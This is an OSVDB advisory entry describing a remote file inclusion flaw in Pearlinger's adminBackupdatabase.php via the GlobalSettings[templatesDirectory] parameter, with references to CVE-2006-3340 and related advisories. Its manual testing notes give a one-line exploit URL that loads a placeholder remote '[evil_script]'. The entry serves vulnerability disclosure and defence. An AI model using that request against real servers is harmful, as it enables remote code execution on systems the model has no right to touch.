Pearlinger Multiple Product adminBackupdatabase.php GlobalSettings[templatesDirectory] Variable Remote File Inclusion

2006-06-27T07:04:08
ID OSVDB:27173
Type osvdb
Reporter zero(xzerox@linuxmail.org), Kw3rLn(kw3rln@hotmail.com)
Modified 2006-06-27T07:04:08

Description

Vulnerability Description

Multiple Pearlinger.com products contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/adminBackupdatabase.php script not properly sanitizing user input supplied to the 'GlobalSettings[templatesDirectory]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Multiple Pearlinger.com products contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/adminBackupdatabase.php script not properly sanitizing user input supplied to the 'GlobalSettings[templatesDirectory]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[evil_script]

References:

Vendor URL: http://pearlforums.sourceforge.net/ Secunia Advisory ID:20819 Related OSVDB ID: 27169 Related OSVDB ID: 27179 Related OSVDB ID: 27176 Related OSVDB ID: 27178 Related OSVDB ID: 27204 Related OSVDB ID: 27171 Related OSVDB ID: 27177 Related OSVDB ID: 27168 Related OSVDB ID: 27170 Related OSVDB ID: 27172 Related OSVDB ID: 27174 Related OSVDB ID: 27175 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0026.html Generic Exploit URL: http://milw0rm.com/exploits/1956 FrSIRT Advisory: ADV-2006-2561 CVE-2006-3340 Bugtraq ID: 18690